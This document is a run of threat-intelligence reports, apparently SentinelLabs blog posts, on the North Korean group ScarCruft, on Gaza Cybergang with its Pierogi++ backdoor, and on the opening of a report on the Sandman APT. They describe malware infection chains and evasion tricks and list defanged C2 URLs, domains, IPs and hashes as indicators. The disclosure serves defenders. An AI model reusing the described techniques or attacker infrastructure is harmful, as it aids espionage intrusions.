The HWP documents contain metadata, including the LinkValue, Last Saved By, and Author metadata values, which provide information on the system accounts where the documents have been created.

HWP document C2 URL and metadata
์กฐ์„  ์‹œ์žฅ ๋ฌผ๊ฐ€ ๋ถ„์„(ํšŒ๋ น).hwp http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=5JV0FAGA6KW1GBHB7LX2HCIC
LinkValue: \Users\Moo\AppData\Local\Temp
Last Saved By: Moo
Author: Moo
์กฐ์„  ์‹œ์žฅ ๋ฌผ๊ฐ€ ๋ถ„์„(์‹ ์˜์ฃผ).hwp http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=GV6BQLRKHW7CRMSLIX8DSNTM
LinkValue: \Users\DailyN~1\AppData\Local\Temp
Last Saved By: dailynk_001
Author: dailynk01

The DailyN~1/dailynk_001/dailynk01 account is particularly interesting since it relates to Daily NK, a prominent South Korean online news outlet that provides independent reporting on North Korea with which we have collaborated in the past. The focus of this organization makes them an attractive target for North Korean threat actors seeking to intrude or impersonate it, a strategy previously observed by SentinelLabs in past Kimsuky campaigns. It remains to be investigated whether this account is used for developing malware involved in Daily NK-related campaigns and/or serves as an additional indicator of the suspected relations between Kimsuky and ScarCruft. Additionally, in our previous reporting on the overlap of suspected North Korean intrusions into a Russian missile engineering organization, we shared links to ScarCruft infrastructure making use of this same illicit naming scheme, such as dallynk[.]com.

Pivoting on the DailyN~1 artifact revealed additional HWP documents that share overlapping metadata information and employ the same OLE-based infection vector, using different C2 URLs.

HWP document (SHA-1 hash) C2 URL and metadata
e9df1f28cfbc831b89a404816a0242ead5bb142c http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=IV3D9YMNJW4EAZNOKX5FB0OP
LinkValue: \Users\DailyN~1\AppData\Local\Temp
Last Saved By: dailynk01
Author: umgdnk-03
2f78abc001534e28eb208a73245ce5389c40ddbe http[://]app[.]documentoffice[.]club/voltage_group_intels?user=HE16AJHVFCZ48HFTGD059IGU
LinkValue: \Users\DailyN~1\AppData\Local\Temp
Last Saved By: dailynk_001
Author: /

The app.documentoffice[.]club domain is also used as C2 endpoint for malicious Microsoft Office documents, employing ActiveX controls to establish communication with the C2 server.

Office document (SHA-1 hash) C2 URL
e46907cfaf96d2fde8da8a0281e4e16958a968ed http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=8B86CA616964A84Y7A75B950
39c97ca820f31e7903ccb190fee02035ffdb37b9 http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE
577c3a0ac66ff71d9541d983e37530500cb9f2a5 http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=MZ9IUNQ7KX7GSLO5LY8HTMP6

At the time of analysis, the C2 URLs were inactive, preventing us from examining their functions and any potential additional payloads they might deliver to the targets. We are still investigating the role of the user and view query parameter values, such as 5JV0FAGA6KW1GBHB7LX2HCIC and H11I75PFF0ZG53NDG00H64OE.

While preparing this report, Genians released research that outlines ScarCruft campaigns throughout 2023, covering certain aspects of the activities discussed in this section. We add to the public information on this activity cluster by providing additional details on the related infrastructure.

Infrastructure associated with this cluster of suspected North Korean threat activity leads to multiple interesting details which we have found useful for further monitoring and analysis of separate campaigns. The domains offlinedocument[.]site and documentoffice[.]club both make use of a variety of subdomains such as open, nav, and app as previously mentioned. During their illicit use, the domains temporarily make use of Lithuaniaโ€™s Cherry Servers virtual private server (VPS) hosting service โ€“ 84.32.131[.]87, and 84.32.131[.]104 in this case.

A repeating trend is the actor registering domains through Namecheap, leaving the domain parked on a Namecheap IP address, and then rotating to Cherry Servers. In separate domains, we observe this same operational workflow, and interestingly other domains which the actor only makes use of for one or two days before shifting back to a parked IP address. We assess this process aims to limit detection and analysis capabilities following their malicious activity, such as hosting a phishing login or malware delivery link.

Examples of this activity can be found through publicly available telemetry, such as that of instantreceive[.]org. This domain hosted a page mimicking GitHub, a characteristic not new to North Korea-attributed threat actors, as we have reported on in the past.

GitHub phishing page
GitHub phishing page

This domain overlaps through the use of unique Cherry Servers hosting IPs, which can be used for further moderate-confidence infrastructure pivoting. We encourage readers to conduct additional research and monitoring. The full list shown here is provided in the IOC table.

ScarCruft Cherry Servers overlap map
Cherry Servers overlap map

ScarCruft Testing Grounds

While investigating ScarCruft activities, we retrieved malware that we assess to be part of ScarCruftโ€™s planning and testing processes. This includes a spectrum of shellcode variants delivering RokRAT, public tooling, and two oversized LNK files, named inteligence.lnk and news.lnk.

Although similar to those implemented by 3. ์ด์œค์‹ ๋ถํ•œ์ธ๊ถŒ๋ฒ• ์‹คํ–‰๋ฐฉ์•ˆ ๋ถํ•œ์ธ๊ถŒ์žฌ๋‹จ ์ถœ๋ฒ” ์ค‘์‹ฌ.lnk and 8. ์ด๋„๊ฑด ๋ถํ•œ์—ฐ๊ตฌ์†Œ ํ† ๋ก ํšŒ.lnk discussed above, the infection chainsย  executed by inteligence.lnk and news.lnk exhibit some differences. This has likely been done to evade detection based on the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community.

Infection chain: news.lnk
Infection chain: news.lnk

inteligence.lnk executes PowerShell code, which locates the executing LNK file based on its filename instead of its filesize. The code then extracts from the LNK file and displays a decoy PDF document (named inteligence.pdf), and downloads from a major Cloud file hosting provider a hex-encoded file named story.txt. The PowerShell code locates the content of the decoy document it extracts from the LNK file based on a byte pattern (50 4b 03 04) instead of a hardcoded file offset.

The PowerShell code then decodes the file, and executes the decoded file content in a thread. story.txt implements a benign shellcode that just opens notepad.exe, indicating that inteligence.lnk has been developed for testing purposes.

In contrast to 3. ์ด์œค์‹ ๋ถํ•œ์ธ๊ถŒ๋ฒ• ์‹คํ–‰๋ฐฉ์•ˆ ๋ถํ•œ์ธ๊ถŒ์žฌ๋‹จ ์ถœ๋ฒ” ์ค‘์‹ฌ.lnk and 8. ์ด๋„๊ฑด ๋ถํ•œ์—ฐ๊ตฌ์†Œ ํ† ๋ก ํšŒ.lnk,ย  inteligence.lnk does not execute a Windows Batch script and an external PowerShell script.

inteligence.lnk: Extraction and display of a decoy document
inteligence.lnk: Extraction and display of a decoy document
inteligence.lnk: Shellcode decoding and execution
inteligence.lnk: Shellcode decoding and execution
inteligence.lnk: Shellcode
inteligence.lnk: Shellcode

news.lnk downloads, in the form of a file named story3.txt, and executes PowerShell code. The implementation and functionality of the code are very similar to that executed by inteligence.lnk, with a major difference being that the shellcode it executes is not downloaded from a remote endpoint but is embedded in the LNK file itself.

In contrast to inteligence.lnk, the shellcode executed by news.lnk is weaponized and deploys the RokRAT backdoor. It is likely that news.lnk is the fully developed version of inteligence.lnk, intended for use in future ScarCruft campaigns. As of the time of writing, we have not observed news.lnk or its variants in the wild.

Both LNK files deploy the same decoy document โ€“ a public research report on the Kimsuky threat group by Genians, a South Korean cybersecurity company. The report is written in Korean and was released in late October 2023.

ScarCruft Decoy document
Decoy document

Given the reportโ€™s technical content, the LNK file names, and ScarCruftโ€™s use of decoys relevant to the targeted individuals, we suspect ScarCruft has been planning phishing or social engineering campaigns on recent developments in the North Korean cyber threat landscape, targeting audiences consuming threat intelligence reports.

Conclusions

The findings outlined in this post highlight ScarCruftโ€™s ongoing dedication to gathering strategic intelligence through targeted attacks. Our insight into ScarCruftโ€™s malware testing activities reveals the adversaryโ€™s commitment to innovating its arsenal and expanding its target list, likely intending to target and/or masquerade as cybersecurity professionals or businesses.

We observed the group experimenting with new infection chains inspired by those they have used in the past. This involves modifying malicious code implementations and excluding certain files from the infection steps, likely as a strategy to evade detection based on filesystem artifacts and the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community.

We suspect that ScarCruft is pursuing non-public cyber threat intelligence and defense strategies. This could benefit not only ScarCruft specifically but also the other constituent groups within the North Korean threat landscape, aiding them in identifying threats to their operations and improving their operational playbooks.

A heightened awareness and better understanding of the adversaryโ€™s attack and infection methods among potential targets are crucial for effective defense. SentinelLabs remains actively engaged in tracking ScarCruft activities and supporting the organizations and individuals at risk of being targeted.

Indicators of Compromise

SHA-1 Hashes

Value Note
0ED884A3FC5C28CDB8562CD28993B30991681B0A intelligence.lnk
2F78ABC001534E28EB208A73245CE5389C40DDBE Malicious HWP document
39C97CA820F31E7903CCB190FEE02035FFDB37B9 Malicious Office document
4024A9B0C0F19A33A3C557C7E220B812EE6FDD17 8. ์ด๋„๊ฑด ๋ถํ•œ์—ฐ๊ตฌ์†Œ ํ† ๋ก ํšŒ.lnk
46C3F9DE79D85165E3749824804235ACA818BA09 9. ๊น€ํƒœ์› ๋ถํ•œ์ธ๊ถŒ ์ „๋ฌธ๊ฐ€ ํ† ๋ก ํšŒ ํ† ๋ก ๋ฌธ.hwp
483B84F973528B23E5C14BC95FBC7031A4B291F1 1. ์ „์˜์„  ๋ถํ•œ ์ฃผ๋ฏผ ์ •๋ณด์ ‘๊ทผ๊ถŒ ๊ฐ•ํ™”๋ฐฉ์•ˆ.hwp
4C74E227190634A6125B2703B05CB16AD69AC051 2.์ด์ƒ์šฉ ๋ฐ˜๋™์‚ฌ์ƒ๋ฌธํ™”๋ฐฐ๊ฒฉ๋ฒ•๊ณผ ์ •๋ณด ์œ ์ž… ํ™œ๋™์˜ ๋ณ€ํ™”.pptx
577C3A0AC66FF71D9541D983E37530500CB9F2A5 Malicious Office document
7C4E37E0A733B5E8F0F723CCA2A9675901527DC4 Decoy document
88DB1E2EFBB888A97A530C8BEF8CA104CEAAB80C public.dat
8951F3EB2845C0060E2697B7F6B25ABE8ADE8737 3. ์ด์œค์‹ ๋ถํ•œ์ธ๊ถŒ๋ฒ• ์‹คํ–‰๋ฐฉ์•ˆ ๋ถํ•œ์ธ๊ถŒ์žฌ๋‹จ ์ถœ๋ฒ” ์ค‘์‹ฌ.lnk
9DD8AA1D66CC4E765E63DC5121216D95E62A0E1C 10. ์„œ์œ ์„ ๋ถํ•œ ์ฃผ๋ฏผ๋“ค์˜ ์•Œ๊ถŒ๋ฆฌ ์ œ๊ณ  ๋ฐฉ์•ˆ.hwp
9E0C6A067AAB113E6A4B68299AB3B9D4C36FC330 news.lnk
9EAAAB9D4F65E3738BB31CDF71462E614FFBD2BA 6. ์ด์ข…๊ฒธ ๋ถํ•œ์ธ๊ถŒ ํ† ๋ก ํšŒ ํ† ๋ก ๋ฌธ.hwp
B23A3738B6174F62E4696080F2D8A5F258799CE5 ์กฐ์„  ์‹œ์žฅ ๋ฌผ๊ฐ€ ๋ถ„์„(ํšŒ๋ น).hwp
B91B318A9FBB153409A846BF173E9D1BD0CC4DBF 111223.bat
C4B58CA12F7B16B6D39CE4222A5A2E054CD77B4E 7. ๋ฐ•์œ ์„ฑ ๋ถํ•œ์ฃผ๋ฏผ ์ •๋ณด์ ‘๊ทผ ๊ฐ•ํ™”๋ฐฉ์•ˆ.hwp
D457D6BDCFA6D31934FB1E277FA0DE7119E9C2A5 5. ์—ฌํ˜„์ฒ  ๋ถํ•œ์ฃผ๋ฏผ ์ •๋ณด์ ‘๊ทผ๊ถŒ ๊ฐ•ํ™” ๋ฐฉ์•ˆ.hwp
D9AC0CC6D7BDC24F52878D3D5AC07696940062D0 myprofile[.]zip
E46907CFAF96D2FDE8DA8A0281E4E16958A968ED Malicious Office document
E9DF1F28CFBC831B89A404816A0242EAD5BB142C Malicious HWP document
FBF4D8C7418B021305317A185B1B3534A2E25CC8 ์กฐ์„  ์‹œ์žฅ ๋ฌผ๊ฐ€ ๋ถ„์„(์‹ ์˜์ฃผ).hwp

Domains

Value Note
app[.]documentoffice[.]club C2 domain (HWP and Office documents)
benefitinfo[.]live VPS overlap (moderate confidence)
benefitinfo[.]pro VPS overlap (moderate confidence)
benefiturl[.]pro VPS overlap (moderate confidence)
careagency[.]online VPS overlap (moderate confidence)
cra-receivenow[.]online VPS overlap (moderate confidence)
crareceive[.]site VPS overlap (moderate confidence)
depositurl[.]co VPS overlap (moderate confidence)
depositurl[.]lat VPS overlap (moderate confidence)
direct.traderfree[.]online VPS overlap (moderate confidence)
forex.traderfree[.]online VPS overlap (moderate confidence)
groceryrebate[.]online VPS overlap (moderate confidence)
groceryrebate[.]site VPS overlap (moderate confidence)
gstcreceive[.]online VPS overlap (moderate confidence)
instantreceive[.]org VPS overlap (moderate confidence)
nav[.]offlinedocument[.]site C2 domain (HWP documents)
receive[.]bio VPS overlap (moderate confidence)
receiveinstant[.]online VPS overlap (moderate confidence)
rentsubsidy[.]help VPS overlap (moderate confidence)
rentsubsidy[.]online VPS overlap (moderate confidence)
tinyurlinstant[.]co VPS overlap (moderate confidence)
urldepost[.]co VPS overlap (moderate confidence)
verifyca[.]online VPS overlap (moderate confidence)
visiononline[.]store VPS overlap (moderate confidence)

URLs

Value Note
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=8B86CA616964A84Y7A75B950 C2 URL (Office document)
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE C2 URL (Office document)
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=MZ9IUNQ7KX7GSLO5LY8HTMP6 C2 URL (Office document)
http[://]app[.]documentoffice[.]club/voltage_group_intels?user=HE16AJHVFCZ48HFTGD059IGU C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=5JV0FAGA6KW1GBHB7LX2HCIC C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=GV6BQLRKHW7CRMSLIX8DSNTM C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=IV3D9YMNJW4EAZNOKX5FB0OP C2 URL (HWP document)

IP Addresses

Value Note
84.32.129[.]32 Cherry Servers VPS
84.32.131[.]104 Cherry Servers VPS
84.32.131[.]30 Cherry Servers VPS
84.32.131[.]50 Cherry Servers VPS
84.32.131[.]59 Cherry Servers VPS
84.32.131[.]66 Cherry Servers VPS
84.32.131[.]87 Cherry Servers VPS

Email Addresses

Value Note
c039911[@]daum.net Phishing email address
kirnchi122[@]hanmail.net Phishing email address

Gaza Cybergang | Unified Front Targeting Hamas Opposition

14 December 2023 at 13:55

Executive Summary

  • Overlaps in targeting, malware characteristics, and long-term malware evolutions post 2018 suggest that the Gaza Cybergang sub-groups have likely been consolidating, possibly involving the establishment of internal and/or external malware supply lines.
  • Gaza Cybergang has upgraded its malware arsenal with a backdoor that we track as Pierogi++, first used in 2022 and seen throughout 2023.
  • Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war.
  • SentinelLabsโ€™ analysis reinforces the suspected ties between Gaza Cybergang and WIRTE, historically considered a distinct cluster with loose relations to the Gaza Cybergang.

Overview

Active since at least 2012, Gaza Cybergang is a suspected Hamas-aligned cluster whose operations are primarily targeting Palestinian entities and Israel, focusing on intelligence collection and espionage. Being a threat actor of interest in the context of the Israel-Hamas war, we track Gaza Cybergang as a group composed of several adjacent sub-groups observed to share victims, TTPs, and use related malware strains since 2018. These include Gaza Cybergang Group 1 (Molerats),ย  Gaza Cybergang Group 2 (Arid Viper, Desert Falcons, APT-C-23), and Gaza Cybergang Group 3 (the group behind Operation Parliament).

The goal of this post is twofold:

  • To highlight relations between recent and historical operations, providing a new common context connecting the Gaza Cybergang sub-groups.
  • To provide recent findings and previously unreported IOCs, which add to the accumulated knowledge of the group and support further collective tracking of Gaza Cybergang activities.

In the midst of Gaza Cybergang activity spanning from late 2022 until late 2023, we observed that the group introduced a new backdoor to their malware arsenal used in targeting primarily Palestinian entities. We track this backdoor as Pierogi++. We assess that Pierogi++ is based on an older malware strain named Pierogi, first observed in 2019. We also observed consistent targeting of Palestinian entities in this time period using the groupโ€™s staple Micropsia family malware and Pierogi++.

This targeting is typical for Gaza Cybergang. These activities are likely aligned with the tensions between the Hamas and Fatah factions, whose reconciliation attempts had been stagnating before and after the outbreak of the Israelโ€“Hamas war. At the time of writing, our visibility into Gaza Cybergangโ€™s activities after the onset of the conflict does not point to significant changes in their intensity or characteristics.

Our analysis of recent and historical malware used in Gaza Cybergang operations highlights new relations between activities that have taken place years apart โ€“ the Big Bang campaign (2018) and Operation Bearded Barbie (2022). Further, technical indicators we observed, originating from a recently reported activity, reinforce a suspected relation between Gaza Cybergang and the lesser-known threat group WIRTE. This group has historically been considered a distinct cluster and then associated with low confidence with the Gaza Cybergang. This demonstrates the intertwined nature of the Gaza Cybergang cluster making the accurate delineation between its constituent and even other suspected Middle Eastern groups challenging.

Throughout our analysis of Gaza Cybergang activities spanning from 2018 until present date we observed consistent malware evolution over relatively long time periods. This ranges from minor changes in used obfuscation techniques, to adopting new development paradigms, and resurfacing old malware strains in the form of new ones (as Pierogi++ demonstrates). In addition, the observed overlaps in targeting and malware similarities across the Gaza Cybergang sub-groups after 2018 suggests that the group has likely been undergoing a consolidation process. This possibly includes the formation of an internal malware development and maintenance hub and/or streamlining supply from external vendors.

Micropsia and Pierogi++ Target Hamas Opposition

The Gaza Cybergang umbrella has continuously targeted Israeli and Palestinian entities preceding the Israel-Hamas war. We observed additional activities spanning from late 2021 to late 2023 aligned with previous research. Our visibility into these activities, and the theme and language of the used lure and decoy documents, indicate that they were primarily targeting Palestinian entities. The majority involved malware variants of the staple Micropsia family.

Among the Micropsia family malware, we observed its Delphi and Python-based variants deploying decoy documents written in Arabic and focussing on Palestinian matters, such as the Palestinian cultural heritage and political events. Many of the associated C2 domain names, such as bruce-ess[.]com and wayne-lashley[.]com, reference public figures, which aligns with the known domain naming conventions of the group. To support further collective tracking of Gaza Cybergang activities, we focus at the end of the report on listing previously unreported Micropsia indicators.

Decoy document
Decoy document

Among the Micropsia activities we identified a backdoor that we assess is based on a malware first reported in 2020 and named Pierogi. This backdoor, which we labeled Pierogi++, is implemented in C++, and we observed its use in 2022 and over 2023. The malware is typically delivered through archive files or weaponized Office documents on Palestinian matters, written in English or Arabic.


Malicious documents distributing Pierogi++
Malicious documents distributing Pierogi++

The documents distributing Pierogi++ use macros to deploy the malware, which then typically masquerades as a Windows artifact, such as a scheduled task or a utility application. The malware implementation is embedded either in the macros or in the documents themselves, often in Base64-encoded form.

Office macro deploying Pierogi++
Office macro deploying Pierogi++

Pierogi++ executables also masquerade as politically-themed documents, with names such as โ€œThe national role of the revolutionary and national councils in confronting the plans for liquidation and Judaizationโ€,ย  โ€œThe situation of Palestinian refugees in Syria refugees in Syriaโ€, and โ€œThe Ministry of State for Wall and Settlement Affairs established by the Palestinian governmentโ€.

We assess that Pierogi++ is based on the Pierogi backdoor, whose variants are implemented in Delphi and Pascal. Pierogi and Pierogi++ share similarities in code and functionalities, such as strings, reconnaissance techniques, and deployment of decoy documents, some also seen in Micropsia malware.

String indicating that no anti-virus solution has been detected: Pierogi++ (Tm9BVg== decodes to NoAV)
String indicating that no anti-virus solution has been detected: Pierogi++ (Tm9BVg== decodes to NoAV)

String indicating that no anti-virus solution has been detected: Micropsia
Micropsia

Further, Pierogi++ samples implement in the same order the same backdoor functionalities as Pierogi: taking screenshots, command execution, and downloading attacker-provided files.

When handling backdoor commands, some Pierogi++ samples use the strings download and screen, whereas earlier Pierogi samples have used the Ukrainian strings vydalyty,ย  Zavantazhyty, and Ekspertyza. This raised suspicions at the time of potential external involvement in Pierogiโ€™s development. We have not observed indicators pointing to such involvement in the Pierogi++ samples we analyzed.

Pierogi++ backdoor strings
Pierogi++ backdoor strings

Most of the Pierogi++ C2 servers are registered at Namecheap and hosted by Stark Industries Solutions LTD, aligning with previous infrastructure management practices of the Gaza Cybergang umbrella. The backdoor uses the curl library for exchanging data with the C2 server, a technique that we do not often observe in Gaza Cybergangโ€™s malware arsenal.

Use of the curl library
Use of the curl library

Pierogi++ represents a compelling illustration of the continuous investment in maintenance and innovation of Gaza Cybergangโ€™s malware, likely in an attempt to enhance its capabilities and evade detection based on known malware characteristics.

From Molerats to Arid Viper And Beyond

Following the first report on the Pierogi backdoor in February 2020, late 2020 and 2021 mark the association of the backdoor and its infrastructure with Arid Viper. The Micropsia activity linked to Arid Viper, which led to the discovery of the then-new PyMicropsia malware in December 2020, includes Pierogi samples. Further historical Pierogi samples use the escanor[.]live and nicoledotso[.]icu domains for C2 purposes, which have been associated with Arid Viper in December 2020 and April 2021. The latest variant of Pierogi is Pierogi++, which we observed targeting Palestinian entities in 2022 and over 2023 โ€“ this targeting is typical for Arid Viper.

Our investigations into malware used by Gaza Cybergang prior to 2022, which share capabilities, structure, and infrastructure with Pierogi, resulted in a multitude of samples implemented in Delphi, Pascal, and C++. This highlights the frequent adoption of different development paradigms by Gaza Cybergang and aligns with the observations by Facebook, which associates these variants with Arid Viper and tracks them using different names under the broader Micropsia malware family, such as Glasswire, Primewire, and fgref.

Malware attributions
Malware attributions

In late 2020, victims targeted with Pierogi variants as part of a suspected Arid Viper operation were observed to be also infected with the then-new SharpStage and DropBook malware, an overlap assessed to strengthen the ties between the Molerats and Arid Viper Gaza Cybergang sub-groups.

Later in June 2021, the LastConn malware, which has been discovered as part of activities attributed to the TA402 cluster, was assessed with high confidence to be an updated version of SharpStage.

Based on our followup investigation into recent 2023 TA402 activity targeting Middle Eastern government entities, we highlight concrete overlaps in malware used by TA402 and a lesser-known threat actor named WIRTE. First disclosed in April 2019, WIRTE was initially considered to be a distinct cluster but later associated with low confidence to the Gaza Cybergang umbrella (primarily based on the use of decoys on Palestinian matters, which are typical for the Gaza Cybergang constituent sub-groups).

WIRTE is known for using a unique custom user agent for C2 communication when staging malware, with the value of the rv field likely being an intrusion identifier. WIRTEโ€™s stagers encapsulate C2 communication attempts in an infinite loop, separated by sleep periods of randomly generated lengths within defined lower and upper boundaries. We observe the same unique user agent format and C2 communication pattern in TA402โ€™s .NET malware stagers.

User agent and C2 communication in 2020 WIRTE
User agent and C2 communication in 2020 WIRTE malware

User agent and C2 communication in 2022 TA401 malware
User agent and C2 communication in 2022 TA401 malware

The involvement of malware artifacts previously seen only in the context of WIRTE indicates a likely relation between the TA402, WIRTE, and Gaza Cybergang clusters. This aligns with the latest TA402 attribution assessment as a cluster overlapping with Gaza Cybergang and WIRTE.

Back To The Big Bang

Operation Bearded Barbie, revealed in April 2022 and attributed with moderate-high confidence to Arid Viper, is a campaign that has been targeting Israeli individuals and officials in the law enforcement, military, and emergency services sectors. The operation highlights the BarbWire backdoor as a novel malware in Arid Viperโ€™s arsenal.

A closer look at the implementation of the BarbWire variants observed as part of Operation Bearded Barbie reveal relations to a malware strain used as part of the 2018 Big Bang campaign, which was considered an evolution of a 2017 campaign targeting Palestinian individuals and entities. Without making a concrete attribution at the time, the campaign was loosely associated with the Gaza Cybergang, noting some links to Arid Viper in particular.

The Big Bang campaign involves the use of a C++ implant, assessed to be an upgraded version of older Micropsia variants. In addition to some similarities in execution flow and structure, we observed that the backdoors used in the Big Bang and Bearded Barbie campaigns share unique strings that report the execution status and/or indicate internal references to malware modules.

The BarbWire samples used as part of Operation Bearded Barbie are reported to implement a custom base64 algorithm (cit.) to obfuscate strings. The backdoor does not implement changes to the Base64 encoding algorithm itself, but modifies Base64 strings by adding an extra character that is removed before decoding. String decoding of BarbWire strings in this way reveals exact matches between BarbWire and the backdoor observed in the Big Bang campaign.

Backdoor string matches
Backdoor string matches

In contrast to BarbWire, BigBang backdoor samples obfuscate the same strings present in BarbWire using Base64-encoding only. The malware authors have likely introduced the Base64 string modification technique in later malware development efforts (reflected in Operation Bearded Barbie), as a relatively simple but effective attempt to evade detection based on known string artifacts.

This technique also allows for quick changes of the modified Base64 strings by only changing the second character to keep evading detection over time. For example, both of the strings IZERvZXMgbm90IGV4aXN0Lg and IHERvZXMgbm90IGV4aXN0Lg Base64-decode to โ€œ Does not exist.โ€ once the second character is removed.

Conclusions

Gaza Cybergang operations over 2022 and 2023 reveal a sustained focus on targeting Palestinian entities. The discovery of the Pierogi++ backdoor shows that the group continues to evolve and supplement its staple malware arsenal, including transforming older implementations into new tooling.

The intertwined nature of its constituent sub-groups sharing TTPs, malware, and victims, indicates that Gaza Cybergang is a unified front against anti-Hamas interests. The persistent nature of the Gaza Cybergang threat underscores the necessity for sustained vigilance and cooperative measures to address the challenges posed by these threat actors.

SentinelLabs continues to monitor Gaza Cybergang activities to further improve the collective knowledge on the groupโ€™s dynamics and to supply indicators, which are relevant to security teams defending their organizations and individuals at risk of being targeted.

Indicators of Compromise

SHA-1 Hashes

003bb055758a7d687f12b65fc802bac07368335e Micropsia family malware
19026b6eb5c1c272d33bda3eab8197bec692abab Micropsia family malware
20c10d0eff2ef68b637e22472f14d87a40c3c0bd Pierogi backdoor
26fe41799f66f51247095115f9f1ff5dcc56baf8 TA402 malware staging executable (2022 version)
278565e899cb48138cc0bbc482beee39e4247a5d Pierogi backdoor
2a45843cab0241cce3541781e4e19428dcf9d949 Micropsia family malware
32d0073b8297cc8350969fd4b844d80620e2273a Document distributing Pierogi++
3ae41f7a84ca750a774f777766ccf4fd38f7725a Document distributing Pierogi++
42cb16fc35cfc30995e5c6a63e32e2f9522c2a77 Pierogi++
4dcdb7095da34b3cef73ad721d27002c5f65f47b BarbWire backdoor
5128d0af7d700241f227dd3f546b4af0ee420bbc Pierogi++
5619e476392c195ba318a5ff20e40212528729ba Micropsia family malware
599cf23db2f4d3aa3e19d28c40b3605772582cae Pierogi backdoor
5e46151df994b7b71f58556c84eeb90de0776609 Document distributing Pierogi++
5fcc262197fe8e0f129acab79fd28d32b30021d7 WIRTE PowerShell script
60480323f0e6efa3ec08282650106820b1f35d2f Archive distributing Pierogi++
694fa6436302d55c544cfb4bc9f853d3b29888ef BarbWire backdoor
708f05d39df7e47aefc4b15cb2db9f26bc9fad5f TA402 malware staging executable (2022 version)
745657b4902a451c72b4aab6cf00d05895bbc02f Micropsia family malware
75a63321938463b8416d500b34a73ce543a9d54d Pierogi++
95fc3fb692874f7415203a819543b1e0dd495a57 Micropsia family malware
994ebbe444183e0d67b13f91d75b0f9bcfb011db Operation Big Bang backdoor
aeeeee47becaa646789c5ee6df2a6e18f1d25228 Pierogi++
c3038d7b01813b365fd9c5fd98cd67053ed22371 Micropsia family malware
da96a8c04edf8c39d9f9a98381d0d549d1a887e8 Pierogi++
ee899ae5de50fdee657e04ccd65d76da7ede7c6f Operation Big Bang backdoor
f3e99ec389e6108e8fda6896fa28a4d7237995be Pierogi++

Domains

aracaravan[.]com Pierogi++ C2 server
beatricewarner[.]com Pierogi++ C2 server
bruce-ess[.]com Micropsia C2 server
claire-conway[.]com Micropsia C2 server
delooyp[.]com Micropsia C2 server
escanor[.]live Pierogi backdoor C2 server
izocraft[.]com Micropsia C2 server
jane-chapman[.]com Micropsia C2 server
lindamullins[.]info Operation Big Bang backdoor C2 server
nicoledotson[.]icu Pierogi backdoor C2 server
overingtonray[.]info Pierogi backdoor C2 server
porthopeminorhockey[.]net Micropsia C2 server
spgbotup[.]club Operation Big Bang backdoor C2 server
stgeorgebankers[.]com WIRTE C2 server
swsan-lina-soso[.]info Pierogi++ C2 server
theconomics[.]net TA402 C2 server
wanda-bell[.]website BarbWire C2 server
wayne-lashley[.]com Micropsia C2 server
zakaria-chotzen[.]info Pierogi++ C2 server

Sandman APT | China-Based Adversaries Embrace Lua

11 December 2023 at 13:55

By Aleksandar Milenkoski, Bendik Hagen (PwC), and Microsoft Threat Intelligence

Executive Summary

  • The Sandman APT is likely associated with suspected China-based threat clusters known to use the KEYPLUG backdoor, in particular a cluster jointly presented by PwC and Microsoft at Labscon 2023 โ€“ STORM-0866/Red Dev 40.
  • The Sandmanโ€™s Lua-based malware LuaDream and the KEYPLUG backdoor were observed co-existing in the same victim environments.
  • Sandman and STORM-0866/Red Dev 40 share infrastructure control and management practices, including hosting provider selections, and domain naming conventions.
  • The implementation of LuaDream and KEYPLUG reveals indicators of shared development practices and overlaps in functionalities and design, suggesting shared functional requirements by their operators.
  • The use of the Lua development paradigm in the cyberespionage domain, historically associated with actors considered Western or Western-aligned, is likely being adopted by a broader range of adversaries, including those with ties to China.

Overview

In this report, SentinelLabs, Microsoft, and PwC threat intelligence researchers provide attribution-relevant information on the Sandman APT cluster positioning this threat on the broader threat landscape. We highlight links between Sandman and a suspected China-based threat actor using the shared KEYPLUG backdoor โ€“ STORM-0866/Red Dev 40. This includes victimology overlaps, cohabitation, and sharing C2 infrastructure control and management practices.

STORM-0866/Red Dev 40 is a developing APT threat cluster primarily targeting entities in the Middle East and the South Asian subcontinent, including telecommunication providers and government entities. These are regions and sectors where we also observed Sandman activity. The modular backdoor KEYPLUG is a staple in STORM-0866/Red Dev 40โ€™s arsenal. Mandiant first reported on KEYPLUG as part of intrusions into U.S. government entities by the Chinese APT group APT41.

Microsoft and PwC have subsequently identified at least three other developing clusters involving KEYPLUG, including STORM-0866/Red Dev 40. Their research, making the case that KEYPLUG is likely shared among multiple suspected China-based groups, was presented at LabsCon 2023. They distinguish STORM-0866/Red Dev 40 from the other clusters based on specific malware characteristics, such as unique encryption keys for KEYPLUG C2 communication, and a higher sense of operational security, such as relying on Cloud-based reverse proxy infrastructure for hiding the true hosting locations of their C2 servers.

SentinelLabs and Microsoft have observed Sandmanโ€™s LuaDream and KEYPLUG implants cohabiting in the same victim environments, some of which are on the same endpoints. LuaDream is a maintained modular backdoor based on LuaJIT, with version 11.0.2.1.23.1 observed in March 2023 and version 12.0.2.5.23.29 observed in August 2023. In one instance, the KEYPLUG malware had been deployed approximately 3 months prior to LuaDream (in May 2023). LuaDream and KEYPLUG were active at the same time over approximately 2 weeks until both threats were remediated. During this time period, we did not observe any contestation or deconfliction activities by the LuaDream or KEYPLUG operators.

A close examination of the implementation and C2 infrastructure of these distinct malware strains revealed indicators of shared development as well as infrastructure control and management practices, and some overlaps in functionalities and design, suggesting shared functional requirements by their operators.

